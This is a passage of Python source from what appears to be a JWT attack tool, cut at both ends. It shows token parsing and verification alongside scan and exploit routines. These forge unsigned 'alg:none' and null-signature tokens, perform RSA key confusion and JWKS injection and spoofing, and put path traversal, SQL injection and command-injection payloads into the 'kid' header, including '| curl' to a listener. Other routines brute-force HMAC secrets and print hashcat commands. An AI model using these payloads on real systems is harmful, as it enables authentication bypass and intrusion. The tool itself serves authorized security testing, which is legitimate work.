newContents.encode('UTF-8') if "-" in sig: try: sig = base64.urlsafe_b64decode(sig) except: pass try: sig = base64.urlsafe_b64decode(sig+"=") except: pass try: sig = base64.urlsafe_b64decode(sig+"==") except: pass elif "+" in sig: try: sig = base64.b64decode(sig) except: pass try: sig = base64.b64decode(sig+"=") except: pass try: sig = base64.b64decode(sig+"==") except: pass else: cprintc("Signature not Base64 encoded HEX", "red") if headDict['alg'] == "PS256": h = SHA256.new(newContents) elif headDict['alg'] == "PS384": h = SHA384.new(newContents) elif headDict['alg'] == "PS512": h = SHA512.new(newContents) else: cprintc("Invalid RSA algorithm", "red") verifier = pss.new(key) try: valid = verifier.verify(h, sig) cprintc("RSA-PSS Signature is VALID", "green") valid = True except: cprintc("RSA-PSS Signature is INVALID", "red") valid = False return valid def exportJWKS(jku): try: kid = headDict["kid"] newSig, newContents, newjwks, privKeyName, jwksName, fulljwks = jwksGen(headDict, paylDict, jku, config['crypto']['privkey'], kid) except: kid = "" newSig, newContents, newjwks, privKeyName, jwksName, fulljwks = jwksGen(headDict, paylDict, jku, config['crypto']['privkey']) return newContents, newSig def parseJWKS(jwksfile): jwks = open(jwksfile, "r").read() jwksDict = json.loads(jwks, object_pairs_hook=OrderedDict) nowtime = int(datetime.now().timestamp()) cprintc("JWKS Contents:", "cyan") try: keyLen = len(jwksDict["keys"]) cprintc("Number of keys: "+str(keyLen), "cyan") i = -1 for jkey in range(0,keyLen): i += 1 cprintc("\n--------", "white") try: cprintc("Key "+str(i+1), "cyan") kid = str(jwksDict["keys"][i]["kid"]) cprintc("kid: "+kid, "cyan") except: kid = i cprintc("Key "+str(i+1), "cyan") for keyVal in jwksDict["keys"][i].items(): keyVal = keyVal[0] cprintc("[+] "+keyVal+" = "+str(jwksDict["keys"][i][keyVal]), "green") try: x = str(jwksDict["keys"][i]["x"]) y = str(jwksDict["keys"][i]["y"]) cprintc("\nFound ECC key factors, generating a public key", "cyan") pubkeyName = genECPubFromJWKS(x, y, kid, nowtime) cprintc("[+] "+pubkeyName, "green") cprintc("\nAttempting to verify token using "+pubkeyName, "cyan") valid = verifyTokenEC(headDict, paylDict, sig, pubkeyName) except: pass try: n = str(jwksDict["keys"][i]["n"]) e = str(jwksDict["keys"][i]["e"]) cprintc("\nFound RSA key factors, generating a public key", "cyan") pubkeyName = genRSAPubFromJWKS(n, e, kid, nowtime) cprintc("[+] "+pubkeyName, "green") cprintc("\nAttempting to verify token using "+pubkeyName, "cyan") valid = verifyTokenRSA(headDict, paylDict, sig, pubkeyName) except: pass except: cprintc("Single key file", "white") for jkey in jwksDict: cprintc("[+] "+jkey+" = "+str(jwksDict[jkey]), "green") try: kid = 1 x = str(jwksDict["x"]) y = str(jwksDict["y"]) cprintc("\nFound ECC key factors, generating a public key", "cyan") pubkeyName = genECPubFromJWKS(x, y, kid, nowtime) cprintc("[+] "+pubkeyName, "green") cprintc("\nAttempting to verify token using "+pubkeyName, "cyan") valid = verifyTokenEC(headDict, paylDict, sig, pubkeyName) except: pass try: kid = 1 n = str(jwksDict["n"]) e = str(jwksDict["e"]) cprintc("\nFound RSA key factors, generating a public key", "cyan") pubkeyName = genRSAPubFromJWKS(n, e, kid, nowtime) cprintc("[+] "+pubkeyName, "green") cprintc("\nAttempting to verify token using "+pubkeyName, "cyan") valid = verifyTokenRSA(headDict, paylDict, sig, pubkeyName) except: pass def genECPubFromJWKS(x, y, kid, nowtime): try: x = int.from_bytes(base64.urlsafe_b64decode(x), byteorder='big') except: pass try: x = int.from_bytes(base64.urlsafe_b64decode(x+"="), byteorder='big') except: pass try: x = int.from_bytes(base64.urlsafe_b64decode(x+"=="), byteorder='big') except: pass try: y = int.from_bytes(base64.urlsafe_b64decode(y), byteorder='big') except: pass try: y = int.from_bytes(base64.urlsafe_b64decode(y+"="), byteorder='big') except: pass try: y = int.from_bytes(base64.urlsafe_b64decode(y+"=="), byteorder='big') except: pass new_key = ECC.construct(curve='P-256', point_x=x, point_y=y) pubKey = new_key.public_key().export_key(format="PEM")+"\n" pubkeyName = "kid_"+str(kid)+"_"+str(nowtime)+".pem" with open(pubkeyName, 'w') as test_pub_out: test_pub_out.write(pubKey) return pubkeyName def genRSAPubFromJWKS(n, e, kid, nowtime): try: n = int.from_bytes(base64.urlsafe_b64decode(n), byteorder='big') except: pass try: n = int.from_bytes(base64.urlsafe_b64decode(n+"="), byteorder='big') except: pass try: n = int.from_bytes(base64.urlsafe_b64decode(n+"=="), byteorder='big') except: pass try: e = int.from_bytes(base64.urlsafe_b64decode(e), byteorder='big') except: pass try: e = int.from_bytes(base64.urlsafe_b64decode(e+"="), byteorder='big') except: pass try: e = int.from_bytes(base64.urlsafe_b64decode(e+"=="), byteorder='big') except: pass new_key = RSA.construct((n, e)) pubKey = new_key.publickey().exportKey(format="PEM") pubkeyName = "kid_"+str(kid)+"_"+str(nowtime)+".pem" with open(pubkeyName, 'w') as test_pub_out: test_pub_out.write(pubKey.decode()+"\n") return pubkeyName def getVal(promptString): newVal = input(promptString) try: newVal = json.loads(newVal) except ValueError: try: newVal = json.loads(newVal.replace("'", '"')) except ValueError: pass return newVal def genContents(headDict, paylDict, newContents=""): if paylDict == {}: newContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"." else: newContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") return newContents.encode().decode('UTF-8') def dissectPayl(paylDict, count=False): timeseen = 0 comparestamps = [] countval = 0 expiredtoken = False nowtime = int(datetime.now().timestamp()) for claim in paylDict: countval += 1 if count: placeholder = str(countval) else: placeholder = "+" if claim in ["exp", "nbf", "iat"]: timestamp = datetime.fromtimestamp(int(paylDict[claim])) if claim == "exp": if int(timestamp.timestamp()) < nowtime: expiredtoken = True cprintc("["+placeholder+"] "+claim+" = "+str(paylDict[claim])+" ==> TIMESTAMP = "+timestamp.strftime('%Y-%m-%d %H:%M:%S')+" (UTC)", "green") timeseen += 1 comparestamps.append(claim) elif isinstance(paylDict[claim], dict): cprintc("["+placeholder+"] "+claim+" = JSON object:", "green") for subclaim in paylDict[claim]: if type(castInput(paylDict[claim][subclaim])) == str: cprintc(" [+] "+subclaim+" = \""+str(paylDict[claim][subclaim])+"\"", "green") elif paylDict[claim][subclaim] == None: cprintc(" [+] "+subclaim+" = null", "green") elif paylDict[claim][subclaim] == True and not paylDict[claim][subclaim] == 1: cprintc(" [+] "+subclaim+" = true", "green") elif paylDict[claim][subclaim] == False and not paylDict[claim][subclaim] == 0: cprintc(" [+] "+subclaim+" = false", "green") else: cprintc(" [+] "+subclaim+" = "+str(paylDict[claim][subclaim]), "green") else: if type(paylDict[claim]) == str: cprintc("["+placeholder+"] "+claim+" = \""+str(paylDict[claim])+"\"", "green") else: cprintc("["+placeholder+"] "+claim+" = "+str(paylDict[claim]), "green") return comparestamps, expiredtoken def validateToken(jwt): try: headB64, paylB64, sig = jwt.split(".",3) except: cprintc("[-] Invalid token:\nNot 3 parts -> header.payload.signature", "red") exit(1) try: sig = base64.urlsafe_b64encode(base64.urlsafe_b64decode(sig + "=" * (-len(sig) % 4))).decode('UTF-8').strip("=") except: cprintc("[-] Invalid token:\nCould not base64-decode SIGNATURE - incorrect formatting/invalid characters", "red") cprintc("----------------", "white") cprintc(headB64, "cyan") cprintc(paylB64, "cyan") cprintc(sig, "red") exit(1) contents = headB64+"."+paylB64 contents = contents.encode() try: head = base64.urlsafe_b64decode(headB64 + "=" * (-len(headB64) % 4)) except: cprintc("[-] Invalid token:\nCould not base64-decode HEADER - incorrect formatting/invalid characters", "red") cprintc("----------------", "white") cprintc(headB64, "red") cprintc(paylB64, "cyan") cprintc(sig, "cyan") exit(1) try: payl = base64.urlsafe_b64decode(paylB64 + "=" * (-len(paylB64) % 4)) except: cprintc("[-] Invalid token:\nCould not base64-decode PAYLOAD - incorrect formatting/invalid characters", "red") cprintc("----------------", "white") cprintc(headB64, "cyan") cprintc(paylB64, "red") cprintc(sig, "cyan") exit(1) try: headDict = json.loads(head, object_pairs_hook=OrderedDict) except: cprintc("[-] Invalid token:\nHEADER not valid JSON format", "red") cprintc(head.decode('UTF-8'), "red") exit(1) if payl.decode() == "": cprintc("Payload is blank", "white") paylDict = {} else: try: paylDict = json.loads(payl, object_pairs_hook=OrderedDict) except: cprintc("[-] Invalid token:\nPAYLOAD not valid JSON format", "red") cprintc(payl.decode('UTF-8'), "red") exit(1) if args.verbose: cprintc("Token: "+head.decode()+"."+payl.decode()+"."+sig+"\n", "green") return headDict, paylDict, sig, contents def rejigToken(headDict, paylDict, sig): cprintc("=====================\nDecoded Token Values:\n=====================", "white") cprintc("\nToken header values:", "white") for claim in headDict: if isinstance(headDict[claim], dict): cprintc("[+] "+claim+" = JSON object:", "green") for subclaim in headDict[claim]: if headDict[claim][subclaim] == None: cprintc(" [+] "+subclaim+" = null", "green") elif headDict[claim][subclaim] == True: cprintc(" [+] "+subclaim+" = true", "green") elif headDict[claim][subclaim] == False: cprintc(" [+] "+subclaim+" = false", "green") elif type(headDict[claim][subclaim]) == str: cprintc(" [+] "+subclaim+" = \""+str(headDict[claim][subclaim])+"\"", "green") else: cprintc(" [+] "+subclaim+" = "+str(headDict[claim][subclaim]), "green") else: if type(headDict[claim]) == str: cprintc("[+] "+claim+" = \""+str(headDict[claim])+"\"", "green") else: cprintc("[+] "+claim+" = "+str(headDict[claim]), "green") cprintc("\nToken payload values:", "white") comparestamps, expiredtoken = dissectPayl(paylDict) if len(comparestamps) >= 2: cprintc("\nSeen timestamps:", "white") cprintc("[*] "+comparestamps[0]+" was seen", "green") claimnum = 0 for claim in comparestamps: timeoff = int(paylDict[comparestamps[claimnum]])-int(paylDict[comparestamps[0]]) if timeoff != 0: timecalc = timeoff if timecalc < 0: timecalc = timecalc*-1 days,hours,mins = 0,0,0 if timecalc >= 86400: days = str(timecalc/86400) days = int(float(days)) timecalc -= days*86400 if timecalc >= 3600: hours = str(timecalc/3600) hours = int(float(hours)) timecalc -= hours*3600 if timecalc >= 60: mins = str(timecalc/60) mins = int(float(mins)) timecalc -= mins*60 if timeoff < 0: timeoff = timeoff*-1 prepost = "[*] "+claim+" is earlier than "+comparestamps[0]+" by: " cprintc(prepost+str(days)+" days, "+str(hours)+" hours, "+str(mins)+" mins", "green") else: prepost = "[*] "+claim+" is later than "+comparestamps[0]+" by: " cprintc(prepost+str(days)+" days, "+str(hours)+" hours, "+str(mins)+" mins", "green") claimnum += 1 if expiredtoken: cprintc("[-] TOKEN IS EXPIRED!", "red") cprintc("\n----------------------\nJWT common timestamps:\niat = IssuedAt\nexp = Expires\nnbf = NotBefore\n----------------------\n", "white") if args.targeturl and not args.crack and not args.exploit and not args.verify and not args.tamper and not args.sign: cprintc("[+] Sending token", "cyan") newContents = genContents(headDict, paylDict) jwtOut(newContents+"."+sig, "Sending token") return headDict, paylDict, sig def searchLog(logID): qResult = "" with open(logFilename, 'r') as logFile: logLine = logFile.readline() while logLine: if re.search(r'^'+logID, logLine): qResult = logLine break else: logLine = logFile.readline() if qResult: qOutput = re.sub(r' - eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', '', qResult) qOutput = re.sub(logID+' - ', '', qOutput) try: jwt = re.findall(r'eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', qResult)[-1] except: cprintc("JWT not included in log", "red") exit(1) cprintc(logID+"\n"+qOutput, "green") cprintc("JWT from request:", "cyan") cprintc(jwt, "green") # headDict, paylDict, sig, contents = validateToken(jwt) # rejigToken(headDict, paylDict, sig) return jwt else: cprintc("ID not found in logfile", "red") def injectOut(newheadDict, newpaylDict): if not args.crack and not args.exploit and not args.verify and not args.tamper and not args.sign: desc = "Injected token with unchanged signature" jwtOut(newContents+"."+sig, "Injected claim", desc) elif args.sign: signingToken(newheadDict, newpaylDict) else: runActions() def scanModePlaybook(): cprintc("\nLAUNCHING SCAN: JWT Attack Playbook", "magenta") origalg = headDict["alg"] # No token tmpCookies = config['argvals']['cookies'] tmpHeader = config['argvals']['header'] if config['argvals']['headerloc'] == "cookies": config['argvals']['cookies'] = strip_dict_cookies(config['argvals']['cookies']) elif config['argvals']['headerloc'] == "headers": config['argvals']['header'] = "" config['argvals']['overridesub'] = "true" config['argvals']['cookies'] = tmpCookies config['argvals']['header'] = tmpHeader # Broken sig jwtTweak = contents.decode()+"."+sig[:-4] jwtOut(jwtTweak, "Broken signature", "This token was sent to check if the signature is being checked") # Persistent jwtOut(jwt, "Persistence check 1 (should always be valid)", "Original token sent to check if tokens work after invalid submissions") # Claim processing order - check reflected output in all claims reflectedClaims() jwtOut(jwt, "Persistence check 2 (should always be valid)", "Original token sent to check if tokens work after invalid submissions") # Weak HMAC secret if headDict['alg'][:2] == "HS" or headDict['alg'][:2] == "hs": cprintc("Testing "+headDict['alg']+" token against common JWT secrets (jwt-common.txt)", "cyan") config['argvals']['keyList'] = "jwt-common.txt" crackSig(sig, contents) # Exploit: blank password accepted in signature key = "" newSig, newContents = signTokenHS(headDict, paylDict, key, 256) jwtBlankPw = newContents+"."+newSig jwtOut(jwtBlankPw, "Exploit: Blank password accepted in signature (-X b)", "This token can exploit a hard-coded blank password in the config") # Exploit: null signature jwtNull = checkNullSig(contents) jwtOut(jwtNull, "Exploit: Null signature (-X n)", "This token was sent to check if a null signature can bypass checks") # Exploit: alg:none noneToks = checkAlgNone(headDict, paylB64) zippedToks = dict(zip(noneToks, ["\"alg\":\"none\"", "\"alg\":\"None\"", "\"alg\":\"NONE\"", "\"alg\":\"nOnE\""])) for noneTok in zippedToks: jwtOut(noneTok, "Exploit: "+zippedToks[noneTok]+" (-X a)", "Testing whether the None algorithm is accepted - which allows forging unsigned tokens") # Exploit: key confusion - use provided PubKey if config['crypto']['pubkey']: newTok, newSig = checkPubKeyExploit(headDict, paylB64, config['crypto']['pubkey']) jwtOut(newTok+"."+newSig, "Exploit: RSA Key Confusion Exploit (provided Public Key)") headDict["alg"] = origalg # Exploit: jwks injection try: origjwk = headDict["jwk"] except: origjwk = False jwksig, jwksContents = jwksEmbed(headDict, paylDict) jwtOut(jwksContents+"."+jwksig, "Exploit: Injected JWKS (-X i)") headDict["alg"] = origalg if origjwk: headDict["jwk"] = origjwk else: del headDict["jwk"] # Exploit: spoof jwks try: origjku = headDict["jku"] except: origjku = False if config['services']['jwksloc']: jku = config['services']['jwksloc'] else: jku = config['services']['jwksdynamic'] newContents, newSig = exportJWKS(jku) jwtOut(newContents+"."+newSig, "Exploit: Spoof JWKS (-X s)", "Signed with JWKS at "+jku) if origjku: headDict["jku"] = origjku else: del headDict["jku"] headDict["alg"] = origalg # kid testing... start try: origkid = headDict["kid"] except: origkid = False # kid inject: blank field, sign with null newheadDict, newHeadB64 = injectheaderclaim("kid", "") key = open(path+"/null.txt").read() newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) jwtOut(newContents+"."+newSig, "Injected kid claim - null-signed with blank kid") # kid inject: path traversal - known path - check for robots.txt, sign with variations of location newheadDict, newHeadB64 = injectheaderclaim("kid", "../../../../../../dev/null") key = open(path+"/null.txt").read() newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) jwtOut(newContents+"."+newSig, "Injected kid claim - null-signed with kid=\"[path traversal]/dev/null\"") newheadDict, newHeadB64 = injectheaderclaim("kid", "/dev/null") key = open(path+"/null.txt").read() newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) jwtOut(newContents+"."+newSig, "Injected kid claim - null-signed with kid=\"/dev/null\"") # kid inject: path traversal - bad path - sign with null newheadDict, newHeadB64 = injectheaderclaim("kid", "/invalid_path") key = open(path+"/null.txt").read() newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) jwtOut(newContents+"."+newSig, "Injected kid claim - null-signed with kid=\"/invalid_path\"") # kid inject: RCE - sign with null newheadDict, newHeadB64 = injectheaderclaim("kid", "|sleep 10") key = open(path+"/null.txt").read() newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) jwtOut(newContents+"."+newSig, "Injected kid claim - RCE attempt - SLEEP 10 (did this request pause?)") if config['services']['httplistener']: injectUrl = config['services']['httplistener']+"/RCE_in_kid" newheadDict, newHeadB64 = injectheaderclaim("kid", "| curl "+injectUrl) key = open(path+"/null.txt").read() newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) jwtOut(newContents+"."+newSig, "Injected kid claim - RCE attempt - curl "+injectUrl+" (did this URL get accessed?)") # kid inject: SQLi explicit value newheadDict, newHeadB64 = injectheaderclaim("kid", "x' UNION SELECT '1';--") key = "1" newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) jwtOut(newContents+"."+newSig, "Injected kid claim - signed with secret = '1' from SQLi") # kid testing... end if origkid: headDict["kid"] = origkid else: del headDict["kid"] headDict["alg"] = origalg # x5u external # Force External Interactions if config['services']['httplistener']: for headerClaim in headDict: injectExternalInteractionHeader(config['services']['httplistener']+"/inject_existing_", headerClaim) for payloadClaim in paylDict: injectExternalInteractionPayload(config['services']['httplistener']+"/inject_existing_", payloadClaim) cprintc("External service interactions have been tested - check your listener for interactions", "green") else: cprintc("External service interactions not tested - enter listener URL into 'jwtconf.ini' to try this option", "red") # Accept Common HMAC secret (as alterative signature) with open(config['input']['wordlist'], "r", encoding='utf-8', errors='ignore') as commonPassList: commonPass = commonPassList.readline().rstrip() while commonPass: newSig, newContents = signTokenHS(headDict, paylDict, commonPass, 256) jwtOut(newContents+"."+newSig, "Checking for alternative accepted HMAC signatures, based on common passwords. Testing: "+commonPass+"", "This token can exploit a hard-coded common password in the config") commonPass = commonPassList.readline().rstrip() # SCAN COMPLETE cprintc("Scanning mode completed: review the above results.\n", "magenta") # Further manual testing: check expired token, brute key, find Public Key, run other scans cprintc("The following additional checks should be performed that are better tested manually:", "magenta") if headDict['alg'][:2] == "HS" or headDict['alg'][:2] == "hs": cprintc("[+] Try testing "+headDict['alg'][:2]+" token against weak password configurations by running the following hashcat cracking options:", "green") cprintc("(Already testing against passwords in jwt-common.txt)", "cyan") cprintc("Try using longer dictionaries, custom dictionaries, mangling rules, or brute force attacks.\nhashcat (https://hashcat.net/hashcat/) is ideal for this as it is highly optimised for speed. Just add your JWT to a text file, then use the following syntax to give you a good start:\n\n[*] dictionary attacks: hashcat -a 0 -m 16500 jwt.txt passlist.txt\n[*] rule-based attack: hashcat -a 0 -m 16500 jwt.txt passlist.txt -r rules/best64.rule\n[*] brute-force attack: hashcat -a 3 -m 16500 jwt.txt ?u?l?l?l?l?l?l?l -i --increment-min=6", "cyan") if headDict['alg'][:2] != "HS" and headDict['alg'][:2] != "hs": cprintc("[+] Try hunting for a Public Key for this token. Validate any JWKS you find (-V -jw [jwks_file]) and then use the generated Public Key file with the Playbook Scan (-pk [kid_from_jwks].pem)", "green") cprintc("Common locations for Public Keys are either the web application's SSL key, or stored as a JWKS file in one of these locations:", "cyan") with open('jwks-common.txt', "r", encoding='utf-8', errors='ignore') as jwksLst: nextVal = jwksLst.readline().rstrip() while nextVal: cprintc(nextVal, "cyan") nextVal = jwksLst.readline().rstrip() try: timestamp = datetime.fromtimestamp(int(paylDict['exp'])) cprintc("[+] Try waiting for the token to expire (\"exp\" value set to: "+timestamp.strftime('%Y-%m-%d %H:%M:%S')+" (UTC))", "green") cprintc("Check if still working once expired.", "cyan") except: pass def scanModeErrors(): cprintc("\nLAUNCHING SCAN: Forced Errors", "magenta") # Inject dangerous content-types into existing header claims injectEachHeader(None) injectEachHeader(True) injectEachHeader(False) injectEachHeader("jwt_tool") injectEachHeader(0) # Inject dangerous content-types into existing payload claims injectEachPayload(None) injectEachPayload(True) injectEachPayload(False) injectEachPayload("jwt_tool") injectEachPayload(0) cprintc("Scanning mode completed: review the above results.\n", "magenta") def scanModeCommonClaims(): cprintc("\nLAUNCHING SCAN: Common Claim Injection", "magenta") # Inject external URLs into common claims with open(config['input']['commonHeaders'], "r", encoding='utf-8', errors='ignore') as commonHeaders: nextHeader = commonHeaders.readline().rstrip() while nextHeader: injectExternalInteractionHeader(config['services']['httplistener']+"/inject_common_", nextHeader) nextHeader = commonHeaders.readline().rstrip() with open(config['input']['commonPayloads'], "r", encoding='utf-8', errors='ignore') as commonPayloads: nextPayload = commonPayloads.readline().rstrip() while nextPayload: injectExternalInteractionPayload(config['services']['httplistener']+"/inject_common_", nextPayload) nextPayload = commonPayloads.readline().rstrip() # Inject dangerous content-types into common claims injectCommonClaims(None) injectCommonClaims(True) injectCommonClaims(False) injectCommonClaims("jwt_tool") injectCommonClaims(0) cprintc("Scanning mode completed: review the above results.\n", "magenta") def injectCommonClaims(contentVal): with open(config['input']['commonHeaders'], "r", encoding='utf-8', errors='ignore') as commonHeaders: nextHeader = commonHeaders.readline().rstrip() while nextHeader: origVal = "" try: origVal = headDict[nextHeader] except: pass headDict[nextHeader] = contentVal newContents = genContents(headDict, paylDict) jwtOut(newContents+"."+sig, "Injected "+str(contentVal)+" into Common Header Claim: "+str(nextHeader)) if origVal != "": headDict[nextHeader] = origVal else: del headDict[nextHeader] nextHeader = commonHeaders.readline().rstrip() with open(config['input']['commonPayloads'], "r", encoding='utf-8', errors='ignore') as commonPayloads: nextPayload = commonPayloads.readline().rstrip() while nextPayload: origVal = "" try: origVal = paylDict[nextPayload] except: pass paylDict[nextPayload] = contentVal newContents = genContents(headDict, paylDict) jwtOut(newContents+"."+sig, "Injected "+str(contentVal)+" into Common Payload Claim: "+str(nextPayload)) if origVal != "": paylDict[nextPayload] = origVal else: del paylDict[nextPayload] nextPayload = commonPayloads.readline().rstrip() def injectEachHeader(contentVal): for headerClaim in headDict: origVal = headDict[headerClaim] headDict[headerClaim] = contentVal newContents = genContents(headDict, paylDict) jwtOut(newContents+"."+sig, "Injected "+str(contentVal)+" into Header Claim: "+str(headerClaim)) headDict[headerClaim] = origVal def injectEachPayload(contentVal): for payloadClaim in paylDict: origVal = paylDict[payloadClaim] paylDict[payloadClaim] = contentVal newContents = genContents(headDict, paylDict) jwtOut(newContents+"."+sig, "Injected "+str(contentVal)+" into Payload Claim: "+str(payloadClaim)) paylDict[payloadClaim] = origVal def injectExternalInteractionHeader(listenerUrl, headerClaim): injectUrl = listenerUrl+headerClaim origVal = "" try: origVal = headDict[headerClaim] except: pass headDict[headerClaim] = injectUrl newContents = genContents(headDict, paylDict) jwtOut(newContents+"."+sig, "Injected "+str(injectUrl)+" into Header Claim: "+str(headerClaim)) if origVal != "": headDict[headerClaim] = origVal else: del headDict[headerClaim] def injectExternalInteractionPayload(listenerUrl, payloadClaim): injectUrl = listenerUrl+payloadClaim origVal = "" try: origVal = paylDict[payloadClaim] except: pass paylDict[payloadClaim] = injectUrl newContents = genContents(headDict, paylDict) jwtOut(newContents+"."+sig, "Injected "+str(injectUrl)+" into Payload Claim: "+str(payloadClaim)) if origVal != "": paylDict[payloadClaim] = origVal else: del paylDict[payloadClaim] # def kidInjectAttacks(): # with open(config['argvals']['injectionfile'], "r", encoding='utf-8', errors='ignore') as valLst: # nextVal = valLst.readline() # while nextVal: # newheadDict, newHeadB64 = injectheaderclaim(config['argvals']['headerclaim'], nextVal.rstrip()) # newContents = genContents(newheadDict, paylDict) # jwtOut(newContents+"."+sig, "Injected kid claim", desc) # nextVal = valLst.readline() def reflectedClaims(): checkVal = "jwt_inject_"+hashlib.md5(datetime.now().strftime('%Y-%m-%d %H:%M:%S').encode()).hexdigest()+"_" for claim in paylDict: tmpValue = paylDict[claim] paylDict[claim] = checkVal+claim tmpContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") jwtOut(tmpContents+"."+sig, "Claim processing check in "+claim+" claim", "Token sent to check if the signature is checked before the "+claim+" claim is processed") if checkVal+claim in config['argvals']['rescontent']: cprintc("Injected value in "+claim+" claim was observed - "+checkVal+claim, "red") paylDict[claim] = tmpValue def preScan(): cprintc("Running prescan checks...", "cyan") jwtOut(jwt, "Prescan: original token", "Prescan: original token") if config['argvals']['canaryvalue']: if config['argvals']['canaryvalue'] not in config['argvals']['rescontent']: cprintc("Canary value ("+config['argvals']['canaryvalue']+") was not found in base request - check that this token is valid and you are still logged in", "red") shallWeGoOn = input("Do you wish to continue anyway? (\"Y\" or \"N\")") if shallWeGoOn == "N": exit(1) elif shallWeGoOn == "n": exit(1) origResSize, origResCode = config['argvals']['ressize'], config['argvals']['rescode'] jwtOut("null", "Prescan: no token", "Prescan: no token") nullResSize, nullResCode = config['argvals']['ressize'], config['argvals']['rescode'] if config['argvals']['canaryvalue'] == "": if origResCode == nullResCode: cprintc("Valid and missing token requests return the same Status Code.\nYou should probably specify something from the page that identifies the user is logged-in (e.g. -cv \"Welcome back, ticarpi!\")", "red") shallWeGoOn = input("Do you wish to continue anyway? (\"Y\" or \"N\")") if shallWeGoOn == "N": exit(1) elif shallWeGoOn == "n": exit(1) jwtTweak = contents.decode()+"."+sig[:-4] jwtOut(jwtTweak, "Prescan: Broken signature", "This token was sent to check if the signature is being checked") jwtOut(jwt, "Prescan: repeat original token", "Prescan: repeat original token") if origResCode != config['argvals']['rescode']: cprintc("Original token not working after invalid submission. Testing will need to be done manually, re-authenticating after each invalid submission", "red") exit(1) def runScanning(): cprintc("Running Scanning Module:", "cyan") preScan() if config['argvals']['scanMode'] == "pb": scanModePlaybook() if config['argvals']['scanMode'] == "er": scanModeErrors() if config['argvals']['scanMode'] == "cc": scanModeCommonClaims() if config['argvals']['scanMode'] == "at": scanModePlaybook() scanModeErrors() scanModeCommonClaims() def runExploits(): if args.exploit: if args.exploit == "a": noneToks = checkAlgNone(headDict, paylB64) zippedToks = dict(zip(noneToks, ["\"alg\":\"none\"", "\"alg\":\"None\"", "\"alg\":\"NONE\"", "\"alg\":\"nOnE\""])) for noneTok in zippedToks: desc = "EXPLOIT: "+zippedToks[noneTok]+" - this is an exploit targeting the debug feature that allows a token to have no signature\n(This will only be valid on unpatched implementations of JWT.)" jwtOut(noneTok, "Exploit: "+zippedToks[noneTok], desc) elif args.exploit == "n": jwtNull = checkNullSig(contents) desc = "EXPLOIT: null signature\n(This will only be valid on unpatched implementations of JWT.)" jwtOut(jwtNull, "Exploit: Null signature", desc) elif args.exploit == "b": key = "" newSig, newContents = signTokenHS(headDict, paylDict, key, 256) jwtBlankPw = newContents+"."+newSig desc = "EXPLOIT: Blank password accepted in signature\n(This will only be valid on unpatched implementations of JWT.)" jwtOut(jwtBlankPw, "Exploit: Blank password accepted in signature", desc) elif args.exploit == "i": newSig, newContents = jwksEmbed(headDict, paylDict) desc = "EXPLOIT: injected JWKS\n(This will only be valid on unpatched implementations of JWT.)" jwtOut(newContents+"."+newSig, "Injected JWKS", desc) elif args.exploit == "s": if config['services']['jwksloc']: jku = config['services']['jwksloc'] else: jku = config['services']['jwksdynamic'] newContents, newSig = exportJWKS(jku) if config['services']['jwksloc'] and config['services']['jwksloc'] == args.jwksurl: cprintc("Paste this JWKS into a file at the following location before submitting token request: "+jku+"\n(JWKS file used: "+config['crypto']['jwks']+")\n"+str(config['crypto']['jwks'])+"", "cyan") desc = "Signed with JWKS at "+jku jwtOut(newContents+"."+newSig, "Spoof JWKS", desc) elif args.exploit == "k": if config['crypto']['pubkey']: newTok, newSig = checkPubKeyExploit(headDict, paylB64, config['crypto']['pubkey']) desc = "EXPLOIT: Key-Confusion attack (signing using the Public Key as the HMAC secret)\n(This will only be valid on unpatched implementations of JWT.)" jwtOut(newTok+"."+newSig, "RSA Key Confusion Exploit", desc) else: cprintc("No Public Key provided (-pk)\n", "red") parser.print_usage() def runActions(): if args.tamper: tamperToken(paylDict, headDict, sig) exit(1) if args.verify: if args.pubkey: algType = headDict["alg"][0:2] if algType == "RS": if args.pubkey: verifyTokenRSA(headDict, paylDict, sig, args.pubkey) else: verifyTokenRSA(headDict, paylDict, sig, config['crypto']['pubkey']) exit(1) elif algType == "ES": if config['crypto']['pubkey']: verifyTokenEC(headDict, paylDict, sig, config['crypto']['pubkey']) else: cprintc("No Public Key provided (-pk)\n", "red") parser.print_usage() exit(1) elif algType == "PS": if config['crypto']['pubkey']: verifyTokenPSS(headDict, paylDict, sig, config['crypto']['pubkey']) else: cprintc("No Public Key provided (-pk)\n", "red") parser.print_usage() exit(1) else: cprintc("Algorithm not supported for verification", "red") exit(1) elif args.jwksfile: parseJWKS(config['crypto']['jwks']) else: cprintc("No Public Key or JWKS file provided (-pk/-jw)\n", "red") parser.print_usage() exit(1) runExploits() if args.crack: if args.password: cprintc("Password provided, checking if valid...", "cyan") checkSig(sig, contents, config['argvals']['key']) elif args.dict: crackSig(sig, contents) elif args.keyfile: checkSigKid(sig, contents) else: cprintc("No cracking option supplied:\nPlease specify a password/dictionary/Public Key\n", "red") parser.print_usage() exit(1) if args.query and config['argvals']['sigType'] != "": signingToken(headDict, paylDict) def printLogo(): print() print(" \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m 